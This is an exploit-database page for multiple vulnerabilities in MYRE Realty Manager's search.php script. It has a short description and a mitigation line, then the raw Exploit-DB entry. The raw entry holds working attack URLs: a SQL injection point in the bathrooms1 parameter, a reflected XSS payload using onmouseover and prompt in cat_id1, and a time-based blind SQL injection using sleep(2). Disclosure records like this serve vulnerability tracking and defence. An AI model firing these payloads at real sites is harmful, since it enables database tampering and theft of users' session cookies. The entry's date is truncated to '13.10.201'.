header-logo
Suggest Exploit
vendor:
Realty Manager
by:
d3b4g
8,8
CVSS
HIGH
SQL Injection, Cross Site Scripting, Blind SQL Injection
89, 79, 89
CWE
Product Name: Realty Manager
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
2010

MYRE Realty Manager Multiple Vulnerabilities

The vulnerability exists due to insufficient filtration of user-supplied data in multiple parameters of the 'search.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in the application database. Also, an attacker can inject arbitrary web script or HTML code into a vulnerable application page. Successful exploitation of the vulnerability may allow an attacker to bypass certain security restrictions, steal cookie-based authentication credentials, modify data, and perform other actions with the privileges of a legitimate user.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability. It is recommended to use the latest version of the software.
Source

Exploit-DB raw data:

# Exploit Title:MYRE Realty Manager  Multiple Vulnerabilities
# Date: 13.10.201
# Exploit Author: d3b4g
# Vendor Homepage:http://myrephp.com
# Software Link: http://myrephp.com/demo2/
# Tested on: Windows 7
# Blog: d3b4g.me



  
 
----------------------------------------------------------------------------------
 () SQL Injection :

---------------------------
 http://myrephp.com/demo2/search.php?bathrooms1= {Inject SQL}





() Cross Site Scripting:-




   http://localhost/path/search.php?bathrooms1=&bathrooms2=&bedrooms1=&bedrooms2=&cat_id1=%27%20onmouseover%3dprompt%28927207%29%20bad%3d%27&city1=&community1=&country1=&look=1&nolinks1=20&order=link_id&price1=&price2=&property_type1=&sort=DESC&state1=PENNSYLVANIA&zip1=%20HTTP/1.1






() Blin SQl injection:
  


   http://localhost/path/search.php?bathrooms1=0.5%20or%20%28sleep%282%29%2b1%29%20limit%201%20--



-end-